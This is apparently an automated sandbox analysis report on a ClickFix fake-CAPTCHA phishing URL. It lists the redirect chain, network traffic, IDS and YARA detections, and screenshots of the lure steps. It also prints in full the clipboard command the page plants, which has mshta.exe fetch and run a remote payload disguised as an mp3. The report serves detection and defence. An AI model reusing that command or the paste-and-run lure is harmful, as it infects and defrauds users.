Edit tour

Windows Analysis Report
https://tavipulse.com/67a0c8749504c05865fba2d3

Overview

General Information

Sample URL:https://tavipulse.com/67a0c8749504c05865fba2d3
Analysis ID:1633636
Infos:

Detection

CAPTCHA Scam ClickFix
Score:80
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detect drive by download via clipboard copy & paste
Suricata IDS alerts for network traffic
Yara detected CAPTCHA Scam ClickFix
HTML page adds supicious text to clipboard
Phishing site or detected (based on various text indicators)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Detected suspicious crossdomain redirect
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTML page contains hidden javascript code
May sleep (evasive loops) to hinder dynamic analysis
Searches for the Microsoft Outlook file path

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • chrome.exe (PID: 6684 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6992 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2020,i,15328997582150657620,6731187250416089749,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2076 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 7004 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://tavipulse.com/67a0c8749504c05865fba2d3" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • mshta.exe (PID: 4456 cmdline: "C:\Windows\system32\mshta.exe" https://music-albums.oss-ap-southeast-7.aliyuncs.com/soundtrack.mp3 # ''? am n?t a r?b?t: ??????? Verification UID: 885203 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • cleanup
SourceRuleDescriptionAuthorStrings
1.0.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security
    1.2.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security
      1.1.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security
        No Sigma rule has matched
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-03-10T13:22:04.891651+010028594861A Network Trojan was detected217.142.168.1443192.168.2.1649715TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: https://music-albums.oss-ap-southeast-7.aliyuncs.com/soundtrack.mp3Avira URL Cloud: Label: malware

        Phishing

        barindex
        Source: Yara matchFile source: 1.0.pages.csv, type: HTML
        Source: Yara matchFile source: 1.2.pages.csv, type: HTML
        Source: Yara matchFile source: 1.1.pages.csv, type: HTML
        Source: Chrome DOM: 1.1OCR Text: Verify You Are Human Please verify that you are a human to continue. I'm not a robot
        Source: Chrome DOM: 1.2OCR Text: Verify You Are Human Please veri that ou are a human to continue. Verification Steps 1. Press Windows Button 2. Press CTRL + V 3. Press Enter
        Source: https://objectstorage.ap-singapore-2.oraclecloud.com/n/ax4mqlu25efi/b/rigiho/o/random-check.htmlHTTP Parser: Base64 decoded: https://music-albums.oss-ap-southeast-7.aliyuncs.com/soundtrack.mp3
        Source: https://objectstorage.ap-singapore-2.oraclecloud.com/n/ax4mqlu25efi/b/rigiho/o/random-check.htmlHTTP Parser: No favicon
        Source: https://objectstorage.ap-singapore-2.oraclecloud.com/n/ax4mqlu25efi/b/rigiho/o/random-check.htmlHTTP Parser: No favicon
        Source: https://objectstorage.ap-singapore-2.oraclecloud.com/n/ax4mqlu25efi/b/rigiho/o/random-check.htmlHTTP Parser: No favicon
        Source: unknownHTTPS traffic detected: 8.213.160.91:443 -> 192.168.2.16:49732 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.140.56.69:443 -> 192.168.2.16:49759 version: TLS 1.2
        Source: chrome.exeMemory has grown: Private usage: 5MB later: 38MB

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2859486 - Severity 1 - ETPRO MALWARE Observed ClickFix Powershell Delivery Page Inbound : 217.142.168.1:443 -> 192.168.2.16:49715
        Source: global trafficTCP traffic: 192.168.2.16:49714 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49713 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49699 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49714 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49713 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49699 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49714 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49713 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49699 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49714 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49713 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49699 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49714 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49713 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49699 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49714 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49713 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49699 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49714 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49713 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49699 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49714 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49713 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49699 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49714 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49713 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49699 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49714 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49713 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49699 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49714 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49713 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49699 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49714 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49713 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49699 -> 1.1.1.1:53
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: tavipulse.com to https://objectstorage.ap-singapore-2.oraclecloud.com/n/ax4mqlu25efi/b/rigiho/o/random-check.html
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
        Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
        Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
        Source: unknownTCP traffic detected without corresponding DNS query: 150.171.29.254
        Source: unknownTCP traffic detected without corresponding DNS query: 150.171.29.254
        Source: unknownTCP traffic detected without corresponding DNS query: 150.171.29.254
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.195
        Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
        Source: unknownTCP traffic detected without corresponding DNS query: 172.217.16.195
        Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
        Source: unknownTCP traffic detected without corresponding DNS query: 20.140.56.69
        Source: unknownTCP traffic detected without corresponding DNS query: 20.140.56.69
        Source: unknownTCP traffic detected without corresponding DNS query: 20.140.56.69
        Source: unknownTCP traffic detected without corresponding DNS query: 20.140.56.69
        Source: unknownTCP traffic detected without corresponding DNS query: 20.140.56.69
        Source: unknownTCP traffic detected without corresponding DNS query: 20.140.56.69
        Source: global trafficHTTP traffic detected: GET /67a0c8749504c05865fba2d3 HTTP/1.1Host: tavipulse.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /n/ax4mqlu25efi/b/rigiho/o/random-check.html HTTP/1.1Host: objectstorage.ap-singapore-2.oraclecloud.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://objectstorage.ap-singapore-2.oraclecloud.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: objectstorage.ap-singapore-2.oraclecloud.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://objectstorage.ap-singapore-2.oraclecloud.com/n/ax4mqlu25efi/b/rigiho/o/random-check.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.0.0-beta3/webfonts/fa-brands-400.woff2 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveOrigin: https://objectstorage.ap-singapore-2.oraclecloud.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.cssAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /soundtrack.mp3 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: music-albums.oss-ap-southeast-7.aliyuncs.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /apc/trans.gif?2ddea2ac0734d0cd624551c56ba6a825 HTTP/1.1Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5Accept-Language: en-CHAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: fp-afd.azurefd.usConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: tavipulse.com
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: objectstorage.ap-singapore-2.oraclecloud.com
        Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: music-albums.oss-ap-southeast-7.aliyuncs.com
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: application/jsonContent-Length: 41connection: closedate: Mon, 10 Mar 2025 12:22:11 GMTopc-request-id: xsp-1:jLDghuu-bnPdMkCyZQsdxPAFrcHmMwR-Of5s6Rn5xk2wkOihSIBA7E8XMMyQ1IdNx-api-id: nativex-content-type-options: nosniffstrict-transport-security: max-age=31536000; includeSubDomainsaccess-control-allow-origin: *access-control-allow-methods: POST,PUT,GET,HEAD,DELETE,OPTIONSaccess-control-allow-credentials: trueaccess-control-expose-headers: access-control-allow-credentials,access-control-allow-methods,access-control-allow-origin,connection,content-length,content-type,date,opc-client-info,opc-request-id,strict-transport-security,x-api-id,x-content-type-options
        Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
        Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
        Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
        Source: unknownHTTPS traffic detected: 8.213.160.91:443 -> 192.168.2.16:49732 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.140.56.69:443 -> 192.168.2.16:49759 version: TLS 1.2
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir6684_674544651
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir6684_674544651
        Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
        Source: classification engineClassification label: mal80.phis.win@24/1@9/157
        Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\33CUD2J1\soundtrack[1].mp3
        Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2020,i,15328997582150657620,6731187250416089749,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2076 /prefetch:3
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://tavipulse.com/67a0c8749504c05865fba2d3"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2020,i,15328997582150657620,6731187250416089749,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2076 /prefetch:3
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://tavipulse.com/67a0c8749504c05865fba2d3"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: unknownProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://music-albums.oss-ap-southeast-7.aliyuncs.com/soundtrack.mp3 # ''? am n?t a r?b?t: ??????? Verification UID: 885203
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
        Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
        Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
        Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
        Source: Window RecorderWindow detected: More than 3 window changes detected

        Persistence and Installation Behavior

        barindex
        Source: screenshotOCR Text: e about:blank x X reCAPTCHV3 demo abjectstara ge.ap-sing apore-2.oracl eclo iho/a/random -check. html Verify You Are Human Please veri that ou are a human to continue. Verification Steps 1. Press Windows Button 11 11 2. Press CTRL + V 3. Press Enter 08:22 ENG p Type here to search SG 10/03/2025
        Source: Chrome DOM: 1.2OCR Text: Verify You Are Human Please veri that ou are a human to continue. Verification Steps 1. Press Windows Button 2. Press CTRL + V 3. Press Enter
        Source: screenshotOCR Text: e about:blank X reCAPTCHV3 demo abjectstara ge.ap-sing apore-2.oracl eclo iho/a/random -check. html Customize and control Google Chrome Verify You Are Human Please veri that ou are a human to continue. Verification Steps 1. Press Windows Button 2. Press CTRL + V 3. Press Enter 08:23 ENG p Type here to search SG 10/03/2025
        Source: screenshotOCR Text: -8 about:blank X reCAPTCHV3 demo X abjectstara ge.ap-sing apore-2.oracl eclo iho/a/random -check. html Verify You Are Human Please veri that ou are a human to continue. Verification Steps 1. Press Windows Button Undo Cut 2. Press CTRL + V Copy Paste 3. Press Enter Delete lect All Right to left Reading order x Run Show Unicode control characters Insert Unicode control character Typ et open IME reso Reconversion Open: 08:22 ENG p Type here to search SG 10/03/2025
        Source: screenshotOCR Text: e about:blank X reCAPTCHV3 demo abjectstara ge.ap-sing apore-2.oracl eclo iho/a/random -check. html Verify You Are Human Please veri that ou are a human to continue. Verification Steps 1. Press Windows Button 2. Press CTRL + V 3. Press Enter 08:22 ENG p Type here to search SG 10/03/2025
        Source: screenshotOCR Text: e about:blank X reCAPTCHV3 demo abjectstara ge.ap-sing apore-2.oracl eclo iho/a/random -check. html Verify You Are Human Please veri that ou are a human to continue. Verification Steps 1. Press Windows Button 2. Press CTRL + V 3. Press Enter 08:23 ENG p Type here to search SG 10/03/2025
